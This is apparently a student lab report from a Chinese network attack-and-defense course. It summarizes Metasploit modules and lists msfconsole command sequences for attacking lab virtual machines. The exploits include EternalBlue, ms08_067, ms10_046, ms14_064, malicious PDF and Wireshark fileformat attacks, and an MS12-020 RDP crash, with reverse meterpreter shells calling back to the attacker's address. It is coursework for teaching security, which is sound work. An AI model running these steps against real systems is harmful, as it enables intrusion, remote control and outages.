2018-2019-2 20165312《网络攻防技术》Exp5 MSF基础应用 2018-2019-2 20165312《网络攻防技术》Exp5 MSF基础应用

目录

一、知识点总结

1.MSF攻击方法

  • 主动攻击:扫描主机漏洞,进行攻击
  • 攻击浏览器
  • 攻击其他客户端

2.MSF的六种模块

  • 渗透攻击模块Exploit Modules:攻击漏洞,把shellcode"背"过去
    • 主动渗透攻击:攻击某个系统服务
    • 被动渗透攻击:攻击某个客户端应用
  • 辅助模块Auxiliary Modules:在进行渗透攻击之前得到目标系统丰富的情报信息,它是攻击的前提
    • 网络服务的扫描与查点
    • 探查敏感信息泄露、Fuzz测试发掘漏洞
    • 收集登录密码
  • 攻击载荷Payload Modules:载荷,一段指令(shellcode),目标系统在被渗透攻击之后去执行的代码
  • 空字段模块Nop Modules
    • 一些对程序运行状态不会造成任何实质影响的空操作或无关操作指令,即空指令(滑行区)
    • 由于系统无法精确计算shellcode的起始地址,所以加入nops以增加攻击成功的概率
  • 编码模块Encoders
    • 改变payload形状,使得不出现特定字符
    • 确保攻击载荷中不会出现渗透攻击过程中应加以避免的“坏字符”
  • 后渗透攻击模块Post:攻击成功之后,动态传输代码使其在被控机执行
  • 查看六种模块源码目录/usr/share/metasploit-framework/modules

3.MSF的三种用户操作界面

  • msfconsole
    • 查看模块的具体信息info [exploits|auxiliary|post|payloads|encoders|nops]
    • 查看设置信息show [options]
    • 查看攻击目标类型show [target]
    • 查找命令search
      • 查找2016年产生的在windows平台下的漏洞search ms16 type:exploit platform:windows
  • armitage
    • 启动服务器service postgresql start
    • 启动armitagearmitage
  • webgui

返回目录

二、攻击实例

Exp5-1 实现ms08_067

靶机:Microsoft Windows 2000(10.0.0.140)

payload : generic/shell_reverse_tcp

实验步骤

search portscan # 搜索端口
use auxiliary/scanner/portscan/tcp # 使用漏洞
show options  #显示设置
set RHOSTS 10.0.0.140  # 设置监听者地址
exploit # 攻击

2018-2019-2 20165312《网络攻防技术》Exp5 MSF基础应用
2018-2019-2 20165312《网络攻防技术》Exp5 MSF基础应用

尝试更换一个payload : windows/meterpreter/reverse_tcp

返回目录

Exp5-2 实现MS17_010_eternalblue

靶机:Microsoft Windows 7(10.0.0.168)

payload : generic/shell_reverse_tcp

实验步骤

nmap --script=vuln 10.0.0.168 #查看靶机开放端口、是否存在ms17_010
search ms17_010 #搜索漏洞
use exploit/windows/smb/ms17_010_eternalblue    #使用漏洞
show payloads   #显示可用攻击载荷
set payload generic/shell_reverse_tcp  #选择攻击载荷
show options #查看配置信息
set LHOST 10.0.0.154 #设置监听地址
set RHOSTS 10.0.0.168 #设置靶机地址
exploit #开始攻击

攻击成功

2018-2019-2 20165312《网络攻防技术》Exp5 MSF基础应用
2018-2019-2 20165312《网络攻防技术》Exp5 MSF基础应用
2018-2019-2 20165312《网络攻防技术》Exp5 MSF基础应用
2018-2019-2 20165312《网络攻防技术》Exp5 MSF基础应用

尝试更换一个payload : windows/x64/meterpreter/reverse_tcp

尝试再更换一个payload:windows/x64/meterpreter/bind_tcp

尝试再更换一个payload:windows/x64/shell/reverse_tcp_rc4

返回目录

Exp5-3 实现ms11_050

靶机:Microsoft Windows XP SP3 + IE8 / Windows 7 + IE8

payload : generic/shell_reverse_tcp

实验步骤

返回目录

Exp5-4 实现ms10_046

靶机:Microsoft Windows XP SP3 + IE8 / Windows 7 + IE8

payload : windows/meterpreter/reverse_tcp

实验步骤

这个模块利用了Windows快捷方式文件(. lnk)处理中的一个漏洞,该文件包含指向恶意DLL的图标资源。此模块创建一个WebDAV服务,当以UNC路径访问该服务时,可以使用该服> 务运行任意负载。
2018-2019-2 20165312《网络攻防技术》Exp5 MSF基础应用
2018-2019-2 20165312《网络攻防技术》Exp5 MSF基础应用

show payloads   #显示可用攻击载荷
set payload windows/meterpreter/reverse_tcp #选择攻击载荷
show options #查看配置信息
set LHOST 10.0.0.154  #设置监听地址
exploit #进行攻击

2018-2019-2 20165312《网络攻防技术》Exp5 MSF基础应用
2018-2019-2 20165312《网络攻防技术》Exp5 MSF基础应用

返回目录

Exp5-5 实现ms14_064

靶机:Windows XP

实验步骤

search ms14_064 #进行查找
use exploit/windows/browser/ms14_064_ole_code_execution  #选择攻击模块
show payloads #显示可用攻击载荷
set payload windows/meterpreter/reverse_tcp #设置tcp反向连接
show targets #查看靶机
set SRVHOST 10.0.0.154 #设置攻方IP
set AllowPowerShellPrompt true #因为msf中自带的漏洞利用exp调用的是 powershell。 所以msf中的exp代码只对安装powershell的系统生效
set LHOST 10.0.0.154
set target 0 #设置winXP靶机
exploit #攻击

2018-2019-2 20165312《网络攻防技术》Exp5 MSF基础应用
2018-2019-2 20165312《网络攻防技术》Exp5 MSF基础应用

返回目录

Exp5-6 实现Adobe

靶机:Windows XP

实验步骤

search adobe #进行查找
use windows/fileformat/adobe_cooltype_sing  #使用漏洞
set payload windows/meterpreter/reverse_tcp #选择攻击载荷
set LHOST 10.0.0.154 #攻击者地址
set FILENAME 20165312.pdf #设置生成pdf文件的文件名
exploit #攻击

2018-2019-2 20165312《网络攻防技术》Exp5 MSF基础应用
2018-2019-2 20165312《网络攻防技术》Exp5 MSF基础应用

use exploit/multi/handler #进入监听模块
set payload windows/meterpreter/reverse_tcp  #选择攻击载荷
set LHOST 10.0.0.154 #攻击者地址
exploit #攻击

返回目录

Exp5-7 实现wireshark_packet_dect

靶机:Windows XP

实验步骤

cd /usr/share/metasploit-framework/modules/exploits/windows/fileformat #万里挑一只为exploit
msfconsole #进入控制台
use exploit/windows/fileformat/wireshark_packet_dect.rb  #使用漏洞
info #查看漏洞具体信息(重点当然是description)
set payload windows/meterpreter/reverse_tcp #选择攻击载荷
set LHOST 10.0.0.154 #攻击者地址
exploit #攻击

2018-2019-2 20165312《网络攻防技术》Exp5 MSF基础应用
2018-2019-2 20165312《网络攻防技术》Exp5 MSF基础应用

2018-2019-2 20165312《网络攻防技术》Exp5 MSF基础应用
2018-2019-2 20165312《网络攻防技术》Exp5 MSF基础应用

use exploit/multi/handler #进入监听模块
set payload windows/meterpreter/reverse_tcp  #选择攻击载荷
set LHOST 10.0.0.154 #攻击者地址
exploit #攻击

返回目录

Exp5-8 实现ms10_046

靶机:Windows 7 + IE8

exploit : exploit/windows/smb/ms10_046_shortcut_icon_dllloader

payload : windows/meterpreter/reverse_tcp

实验步骤

search ms10-046 #看看其他的exploit
use exploit/windows/smb/ms10_046_shortcut_icon_dllloader  #使用漏洞
show payloads   #显示可用攻击载荷
set windows/meterpreter/reverse_tcp  #选择攻击载荷
show options #查看配置信息
set LHOST 10.0.0.154 #设置监听地址
set SRVHOST 10.0.0.154 #设置本地收听地址
set RHOSTS 10.0.0.168 #设置靶机地址
exploit #开始攻击

2018-2019-2 20165312《网络攻防技术》Exp5 MSF基础应用
2018-2019-2 20165312《网络攻防技术》Exp5 MSF基础应用

返回目录

Exp5-9 实现MS12-020(CVE-2012-0002)蓝屏攻击

靶机:Windows Server 2008 R2

实验步骤

search ms12-020 #搜索漏洞
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids    #使用漏洞
show options #查看配置信息
set RHOST 10.0.0.132 #设置攻击IP
exploit #开始攻击

返回目录

三、实验中遇到的问题及解决方案

1.在实现ms08-067的时候,一开始我的靶机我使用的是windows xp系统,但是一直没有会话建立

2018-2019-2 20165312《网络攻防技术》Exp5 MSF基础应用
2018-2019-2 20165312《网络攻防技术》Exp5 MSF基础应用

2.进行exploit攻击的时候,出现了如下问题

2018-2019-2 20165312《网络攻防技术》Exp5 MSF基础应用
2018-2019-2 20165312《网络攻防技术》Exp5 MSF基础应用

3.进行MS12-020攻击的时候,出现了如下问题

2018-2019-2 20165312《网络攻防技术》Exp5 MSF基础应用
2018-2019-2 20165312《网络攻防技术》Exp5 MSF基础应用

返回目录

四、实验总结

1.实验总结与体会

实验的过程中一直困苦于no sessions的问题,有些问题最后解决了,有些问题还在遗留,总体上收获很大。虽然之前也使用过msfconsole,但是这次实验从系统上了解了他的六大模块,实验中用的最多的还是exploit和payload。从这次实验,我也更加感受到nmap的强大,感觉nmap和auxiliary的作用有相似之处。之前在做其他课程的实验也使用过nmap,但是这次却让我实验效率提高。

2.离实战还缺些什么技术

啊,这可是差的远了。实验参考了往届学长学姐的分析和做法,也尝试了新的攻击方法,遇到很多问题,好在成功了。对于msf我还是个小白,距离实战还有很远很远的路。

3.用自己的话解释什么是exploit,payload,encode.

exploit攻击者对靶机进行攻击的这一过程

payload攻击者进行攻击的“武器”

encode编码,使得shellcode改变形状,不具有特定字符

返回目录

相关推荐